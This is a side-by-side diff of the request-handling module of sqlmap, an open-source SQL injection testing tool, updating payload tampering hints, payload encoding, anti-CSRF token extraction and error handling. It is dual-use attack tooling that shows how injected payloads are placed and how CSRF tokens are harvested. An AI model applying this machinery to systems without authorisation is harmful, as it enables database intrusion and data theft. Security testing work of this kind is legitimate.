|
||||||
kb.responseTimes.clear()
|
|
||||||
|
|
||||||
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
||||||
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests")
|
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests")
|
||||||
kb.droppingRequests = True
|
kb.droppingRequests = True
|
||||||
warnMsg = "connection timed out to the target URL"
|
warnMsg = "connection timed out to the target URL"
|
||||||
elif "Connection reset" in tbMsg:
|
elif "Connection reset" in tbMsg:
|
||||||
@@ -659,7 +669,7 @@ class Connect(object):
|
|||||||
conf.disablePrecon = True
|
conf.disablePrecon = True
|
||||||
|
|
||||||
if kb.testMode:
|
if kb.testMode:
|
||||||
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is resetting 'suspicious' requests")
|
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests")
|
||||||
kb.droppingRequests = True
|
kb.droppingRequests = True
|
||||||
warnMsg = "connection reset to the target URL"
|
warnMsg = "connection reset to the target URL"
|
||||||
elif "URLError" in tbMsg or "error" in tbMsg:
|
elif "URLError" in tbMsg or "error" in tbMsg:
|
||||||
@@ -684,6 +694,9 @@ class Connect(object):
|
|||||||
status = re.search(r"Handshake status ([\d]{3})", tbMsg)
|
status = re.search(r"Handshake status ([\d]{3})", tbMsg)
|
||||||
errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
|
errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
elif "SqlmapCompressionException" in tbMsg:
|
||||||
|
warnMsg = "problems with response (de)compression"
|
||||||
|
retrying = True
|
||||||
else:
|
else:
|
||||||
warnMsg = "unable to connect to the target URL"
|
warnMsg = "unable to connect to the target URL"
|
||||||
|
|
||||||
@@ -719,7 +732,7 @@ class Connect(object):
|
|||||||
else:
|
else:
|
||||||
logger.debug(warnMsg)
|
logger.debug(warnMsg)
|
||||||
return Connect._retryProxy(**kwargs)
|
return Connect._retryProxy(**kwargs)
|
||||||
elif kb.testMode:
|
elif kb.testMode or isMultiThreadMode():
|
||||||
logger.critical(warnMsg)
|
logger.critical(warnMsg)
|
||||||
return None, None, None
|
return None, None, None
|
||||||
else:
|
else:
|
||||||
@@ -738,16 +751,16 @@ class Connect(object):
|
|||||||
if conn and getattr(conn, "redurl", None):
|
if conn and getattr(conn, "redurl", None):
|
||||||
_ = urlparse.urlsplit(conn.redurl)
|
_ = urlparse.urlsplit(conn.redurl)
|
||||||
_ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
|
_ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
|
||||||
requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1)
|
requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", r"\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1)
|
||||||
|
|
||||||
if kb.resendPostOnRedirect is False:
|
if kb.resendPostOnRedirect is False:
|
||||||
requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg)
|
requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", r"\g<1>GET ", requestMsg)
|
||||||
requestMsg = re.sub(r"(?i)Content-length: \d+\n", "", requestMsg)
|
requestMsg = re.sub(r"(?i)Content-length: \d+\n", "", requestMsg)
|
||||||
requestMsg = re.sub(r"(?s)\n\n.+", "\n", requestMsg)
|
requestMsg = re.sub(r"(?s)\n\n.+", "\n", requestMsg)
|
||||||
|
|
||||||
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, conn.code, status)
|
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, conn.code, status)
|
||||||
else:
|
else:
|
||||||
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status)
|
responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status)
|
||||||
|
|
||||||
if responseHeaders:
|
if responseHeaders:
|
||||||
logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||||
@@ -766,7 +779,8 @@ class Connect(object):
|
|||||||
return page, responseHeaders, code
|
return page, responseHeaders, code
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
|
@stackedmethod
|
||||||
|
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, disableTampering=False):
|
||||||
"""
|
"""
|
||||||
This method calls a function to get the target URL page content
|
This method calls a function to get the target URL page content
|
||||||
and returns its page ratio (0 <= ratio <= 1) or a boolean value
|
and returns its page ratio (0 <= ratio <= 1) or a boolean value
|
||||||
@@ -804,7 +818,7 @@ class Connect(object):
|
|||||||
|
|
||||||
if conf.httpHeaders:
|
if conf.httpHeaders:
|
||||||
headers = OrderedDict(conf.httpHeaders)
|
headers = OrderedDict(conf.httpHeaders)
|
||||||
contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
|
contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers)
|
||||||
|
|
||||||
if (kb.postHint or conf.skipUrlEncode) and postUrlEncode:
|
if (kb.postHint or conf.skipUrlEncode) and postUrlEncode:
|
||||||
postUrlEncode = False
|
postUrlEncode = False
|
||||||
@@ -813,11 +827,15 @@ class Connect(object):
|
|||||||
conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))
|
conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))
|
||||||
|
|
||||||
if payload:
|
if payload:
|
||||||
if kb.tamperFunctions:
|
delimiter = conf.paramDel or (DEFAULT_GET_POST_DELIMITER if place != PLACE.COOKIE else DEFAULT_COOKIE_DELIMITER)
|
||||||
|
|
||||||
|
if not disableTampering and kb.tamperFunctions:
|
||||||
for function in kb.tamperFunctions:
|
for function in kb.tamperFunctions:
|
||||||
|
hints = {}
|
||||||
|
|
||||||
try:
|
try:
|
||||||
payload = function(payload=payload, headers=auxHeaders)
|
payload = function(payload=payload, headers=auxHeaders, delimiter=delimiter, hints=hints)
|
||||||
except Exception, ex:
|
except Exception as ex:
|
||||||
errMsg = "error occurred while running tamper "
|
errMsg = "error occurred while running tamper "
|
||||||
errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex))
|
errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex))
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
@@ -829,6 +847,18 @@ class Connect(object):
|
|||||||
|
|
||||||
value = agent.replacePayload(value, payload)
|
value = agent.replacePayload(value, payload)
|
||||||
|
|
||||||
|
if hints:
|
||||||
|
if HINT.APPEND in hints:
|
||||||
|
value = "%s%s%s" % (value, delimiter, hints[HINT.APPEND])
|
||||||
|
|
||||||
|
if HINT.PREPEND in hints:
|
||||||
|
if place == PLACE.URI:
|
||||||
|
match = re.search(r"\w+\s*=\s*%s" % PAYLOAD_DELIMITER, value) or re.search(r"[^?%s/]=\s*%s" % (re.escape(delimiter), PAYLOAD_DELIMITER), value)
|
||||||
|
if match:
|
||||||
|
value = value.replace(match.group(0), "%s%s%s" % (hints[HINT.PREPEND], delimiter, match.group(0)))
|
||||||
|
else:
|
||||||
|
value = "%s%s%s" % (hints[HINT.PREPEND], delimiter, value)
|
||||||
|
|
||||||
logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\'))
|
logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\'))
|
||||||
|
|
||||||
if place == PLACE.CUSTOM_POST and kb.postHint:
|
if place == PLACE.CUSTOM_POST and kb.postHint:
|
||||||
@@ -837,24 +867,18 @@ class Connect(object):
|
|||||||
# with their HTML encoded counterparts
|
# with their HTML encoded counterparts
|
||||||
payload = payload.replace('>', ">").replace('<', "<")
|
payload = payload.replace('>', ">").replace('<', "<")
|
||||||
elif kb.postHint == POST_HINT.JSON:
|
elif kb.postHint == POST_HINT.JSON:
|
||||||
if payload.startswith('"') and payload.endswith('"'):
|
payload = escapeJsonValue(payload)
|
||||||
payload = json.dumps(payload[1:-1])
|
|
||||||
else:
|
|
||||||
payload = json.dumps(payload)[1:-1]
|
|
||||||
elif kb.postHint == POST_HINT.JSON_LIKE:
|
elif kb.postHint == POST_HINT.JSON_LIKE:
|
||||||
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
||||||
if payload.startswith('"') and payload.endswith('"'):
|
payload = escapeJsonValue(payload)
|
||||||
payload = json.dumps(payload[1:-1])
|
|
||||||
else:
|
|
||||||
payload = json.dumps(payload)[1:-1]
|
|
||||||
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
|
||||||
value = agent.replacePayload(value, payload)
|
value = agent.replacePayload(value, payload)
|
||||||
else:
|
else:
|
||||||
# GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
|
# GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
|
||||||
if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode:
|
if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper()) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode:
|
||||||
skip = False
|
skip = False
|
||||||
|
|
||||||
if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE:
|
if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper():
|
||||||
if kb.cookieEncodeChoice is None:
|
if kb.cookieEncodeChoice is None:
|
||||||
msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282
|
msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282
|
||||||
kb.cookieEncodeChoice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N', boolean=True)
|
kb.cookieEncodeChoice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N', boolean=True)
|
||||||
@@ -862,12 +886,14 @@ class Connect(object):
|
|||||||
skip = True
|
skip = True
|
||||||
|
|
||||||
if not skip:
|
if not skip:
|
||||||
payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below
|
if place in (PLACE.POST, PLACE.CUSTOM_POST): # potential problems in other cases (e.g. URL encoding of whole URI - including path)
|
||||||
|
value = urlencode(value, spaceplus=kb.postSpaceToPlus)
|
||||||
|
payload = urlencode(payload, safe='%', spaceplus=kb.postSpaceToPlus)
|
||||||
value = agent.replacePayload(value, payload)
|
value = agent.replacePayload(value, payload)
|
||||||
postUrlEncode = False
|
postUrlEncode = False
|
||||||
|
|
||||||
if conf.hpp:
|
if conf.hpp:
|
||||||
if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)):
|
if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_PLATFORM.ASP, WEB_PLATFORM.ASPX)):
|
||||||
warnMsg = "HTTP parameter pollution should work only against "
|
warnMsg = "HTTP parameter pollution should work only against "
|
||||||
warnMsg += "ASP(.NET) targets"
|
warnMsg += "ASP(.NET) targets"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
@@ -932,70 +958,84 @@ class Connect(object):
|
|||||||
|
|
||||||
if value and place == PLACE.CUSTOM_HEADER:
|
if value and place == PLACE.CUSTOM_HEADER:
|
||||||
if value.split(',')[0].capitalize() == PLACE.COOKIE:
|
if value.split(',')[0].capitalize() == PLACE.COOKIE:
|
||||||
cookie = value.split(',', 1)[1]
|
cookie = value.split(',', 1)[-1]
|
||||||
else:
|
else:
|
||||||
auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
|
auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1]
|
||||||
|
|
||||||
if conf.csrfToken:
|
if conf.csrfToken:
|
||||||
def _adjustParameter(paramString, parameter, newValue):
|
def _adjustParameter(paramString, parameter, newValue):
|
||||||
retVal = paramString
|
retVal = paramString
|
||||||
match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString)
|
match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString, re.I)
|
||||||
if match:
|
if match:
|
||||||
retVal = re.sub(re.escape(match.group(0)), "%s=%s" % (parameter, newValue), paramString)
|
retVal = re.sub("(?i)%s" % re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString)
|
||||||
else:
|
else:
|
||||||
match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString)
|
match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString, re.I)
|
||||||
if match:
|
if match:
|
||||||
retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString)
|
retVal = re.sub("(?i)%s" % re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString)
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
token = AttribDict()
|
||||||
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
||||||
token = extractRegexResult(r"(?i)<input[^>]+\bname=[\"']?%s[\"']?[^>]*\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))" % re.escape(conf.csrfToken), page or "")
|
match = re.search(r"(?i)<input[^>]+\bname=[\"']?(?P<name>%s)\b[^>]*\bvalue=[\"']?(?P<value>[^>'\"]*)" % conf.csrfToken, page or "", re.I)
|
||||||
|
|
||||||
|
if not match:
|
||||||
|
match = re.search(r"(?i)<input[^>]+\bvalue=[\"']?(?P<value>[^>'\"]*)[\"']?[^>]*\bname=[\"']?(?P<name>%s)\b" % conf.csrfToken, page or "", re.I)
|
||||||
|
|
||||||
|
if not match:
|
||||||
|
match = re.search(r"(?P<name>%s)[\"']:[\"'](?P<value>[^\"']+)" % conf.csrfToken, page or "", re.I)
|
||||||
|
|
||||||
|
if not match:
|
||||||
|
match = re.search(r"\b(?P<name>%s)\s*[:=]\s*(?P<value>\w+)" % conf.csrfToken, str(headers), re.I)
|
||||||
|
|
||||||
|
if not match:
|
||||||
|
match = re.search(r"\b(?P<name>%s)\s*=\s*['\"]?(?P<value>[^;'\"]+)" % conf.csrfToken, page or "", re.I)
|
||||||
|
|
||||||
|
if match:
|
||||||
|
token.name, token.value = match.group("name"), match.group("value")
|
||||||
|
|
||||||
|
match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token.value)
|
||||||
|
if match:
|
||||||
|
token.value = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(','))
|
||||||
|
|
||||||
if not token:
|
if not token:
|
||||||
token = extractRegexResult(r"(?i)<input[^>]+\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))[^>]+\bname=[\"']?%s[\"']?" % re.escape(conf.csrfToken), page or "")
|
if conf.csrfUrl and conf.csrfToken and conf.csrfUrl != conf.url and code == httplib.OK:
|
||||||
|
|
||||||
if not token:
|
|
||||||
match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
|
|
||||||
token = match.group(1) if match else None
|
|
||||||
|
|
||||||
if not token:
|
|
||||||
if conf.csrfUrl != conf.url and code == httplib.OK:
|
|
||||||
if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
|
if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
|
||||||
token = page
|
token.name = conf.csrfToken
|
||||||
|
token.value = page
|
||||||
|
|
||||||
if not token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj):
|
if not token and conf.cj and any(re.search(conf.csrfToken, _.name, re.I) for _ in conf.cj):
|
||||||
for _ in conf.cj:
|
for _ in conf.cj:
|
||||||
if _.name == conf.csrfToken:
|
if re.search(conf.csrfToken, _.name, re.I):
|
||||||
token = _.value
|
token.name, token.value = _.name, _.value
|
||||||
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
|
if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
|
||||||
if post:
|
if post:
|
||||||
post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
|
post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value)
|
||||||
elif get:
|
elif get:
|
||||||
get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
|
get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value)
|
||||||
else:
|
else:
|
||||||
get = "%s=%s" % (conf.csrfToken, token)
|
get = "%s=%s" % (token.name, token.value)
|
||||||
break
|
break
|
||||||
|
|
||||||
if not token:
|
if not token:
|
||||||
errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
|
errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url)
|
||||||
if not conf.csrfUrl:
|
if not conf.csrfUrl:
|
||||||
errMsg += ". You can try to rerun by providing "
|
errMsg += ". You can try to rerun by providing "
|
||||||
errMsg += "a valid value for option '--csrf-url'"
|
errMsg += "a valid value for option '--csrf-url'"
|
||||||
raise SqlmapTokenException, errMsg
|
raise SqlmapTokenException(errMsg)
|
||||||
|
|
||||||
if token:
|
if token:
|
||||||
token = token.strip("'\"")
|
token.value = token.value.strip("'\"")
|
||||||
|
|
||||||
for place in (PLACE.GET, PLACE.POST):
|
for place in (PLACE.GET, PLACE.POST):
|
||||||
if place in conf.parameters:
|
if place in conf.parameters:
|
||||||
if place == PLACE.GET and get:
|
if place == PLACE.GET and get:
|
||||||
get = _adjustParameter(get, conf.csrfToken, token)
|
get = _adjustParameter(get, token.name, token.value)
|
||||||
elif place == PLACE.POST and post:
|
elif place == PLACE.POST and post:
|
||||||
post = _adjustParameter(post, conf.csrfToken, token)
|
post = _adjustParameter(post, token.name, token.value)
|
||||||
|
|
||||||
for i in xrange(len(conf.httpHeaders)):
|
for i in xrange(len(conf.httpHeaders)):
|
||||||
if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower():
|
if conf.httpHeaders[i][0].lower() == token.name.lower():
|
||||||
conf.httpHeaders[i] = (conf.httpHeaders[i][0], token)
|
conf.httpHeaders[i] = (conf.httpHeaders[i][0], token.value)
|
||||||
|
|
||||||
if conf.rParam:
|
if conf.rParam:
|
||||||
def _randomizeParameter(paramString, randomParameter):
|
def _randomizeParameter(paramString, randomParameter):
|
||||||
@@ -1039,7 +1079,7 @@ class Connect(object):
|
|||||||
name = safeVariableNaming(name)
|
name = safeVariableNaming(name)
|
||||||
elif name in keywords:
|
elif name in keywords:
|
||||||
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
|
name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
|
||||||
value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
|
value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus))
|
||||||
variables[name] = value
|
variables[name] = value
|
||||||
|
|
||||||
if cookie:
|
if cookie:
|
||||||
@@ -1058,7 +1098,7 @@ class Connect(object):
|
|||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
compiler.parse(unicodeencode(conf.evalCode.replace(';', '\n')))
|
compiler.parse(unicodeencode(conf.evalCode.replace(';', '\n')))
|
||||||
except SyntaxError, ex:
|
except SyntaxError as ex:
|
||||||
if ex.text:
|
if ex.text:
|
||||||
original = replacement = ex.text.strip()
|
original = replacement = ex.text.strip()
|
||||||
if '=' in original:
|
if '=' in original:
|
||||||
@@ -1086,7 +1126,7 @@ class Connect(object):
|
|||||||
originals.update(variables)
|
originals.update(variables)
|
||||||
evaluateCode(conf.evalCode, variables)
|
evaluateCode(conf.evalCode, variables)
|
||||||
|
|
||||||
for variable in variables.keys():
|
for variable in list(variables.keys()):
|
||||||
if variable.endswith(EVALCODE_KEYWORD_SUFFIX):
|
if variable.endswith(EVALCODE_KEYWORD_SUFFIX):
|
||||||
value = variables[variable]
|
value = variables[variable]
|
||||||
del variables[variable]
|
del variables[variable]
|
||||||
@@ -1109,33 +1149,33 @@ class Connect(object):
|
|||||||
if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):
|
if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):
|
||||||
if re.search(r"<%s\b" % re.escape(name), post):
|
if re.search(r"<%s\b" % re.escape(name), post):
|
||||||
found = True
|
found = True
|
||||||
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||||
elif re.search(r"\b%s>" % re.escape(name), post):
|
elif re.search(r"\b%s>" % re.escape(name), post):
|
||||||
found = True
|
found = True
|
||||||
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||||
|
|
||||||
regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name)
|
regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name)
|
||||||
if not found and re.search(regex, (post or "")):
|
if not found and re.search(regex, (post or "")):
|
||||||
found = True
|
found = True
|
||||||
post = re.sub(regex, "\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)
|
post = re.sub(regex, r"\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)
|
||||||
|
|
||||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
||||||
if not found and re.search(regex, (post or "")):
|
if not found and re.search(regex, (post or "")):
|
||||||
found = True
|
found = True
|
||||||
post = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
post = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||||
|
|
||||||
if re.search(regex, (get or "")):
|
if re.search(regex, (get or "")):
|
||||||
found = True
|
found = True
|
||||||
get = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)
|
get = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)
|
||||||
|
|
||||||
if re.search(regex, (query or "")):
|
if re.search(regex, (query or "")):
|
||||||
found = True
|
found = True
|
||||||
uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)
|
uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)
|
||||||
|
|
||||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
|
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
|
||||||
if re.search(regex, (cookie or "")):
|
if re.search(regex, (cookie or "")):
|
||||||
found = True
|
found = True
|
||||||
cookie = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)
|
cookie = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)
|
||||||
|
|
||||||
if not found:
|
if not found:
|
||||||
if post is not None:
|
if post is not None:
|
||||||
@@ -1162,11 +1202,11 @@ class Connect(object):
|
|||||||
|
|
||||||
if conf.tor:
|
if conf.tor:
|
||||||
warnMsg = "it's highly recommended to avoid usage of switch '--tor' for "
|
warnMsg = "it's highly recommended to avoid usage of switch '--tor' for "
|
||||||
warnMsg += "time-based injections because of its high latency time"
|
warnMsg += "time-based injections because of inherent high latency time"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "")
|
warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "")
|
||||||
warnMsg += "larger statistical model, please wait"
|
warnMsg += "%s statistical model, please wait" % ("larger" if len(kb.responseTimes) == 1 else "reset of")
|
||||||
dataToStdout(warnMsg)
|
dataToStdout(warnMsg)
|
||||||
|
|
||||||
while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:
|
while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:
|
||||||
@@ -1221,14 +1261,17 @@ class Connect(object):
|
|||||||
_, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
_, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
||||||
|
|
||||||
if headers:
|
if headers:
|
||||||
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH):
|
try:
|
||||||
pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
|
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH):
|
||||||
elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE):
|
pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH].split(',')[0])
|
||||||
pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
|
elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE):
|
||||||
|
pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
|
||||||
|
except ValueError:
|
||||||
|
pass
|
||||||
finally:
|
finally:
|
||||||
kb.pageCompress = popValue()
|
kb.pageCompress = popValue()
|
||||||
|
|
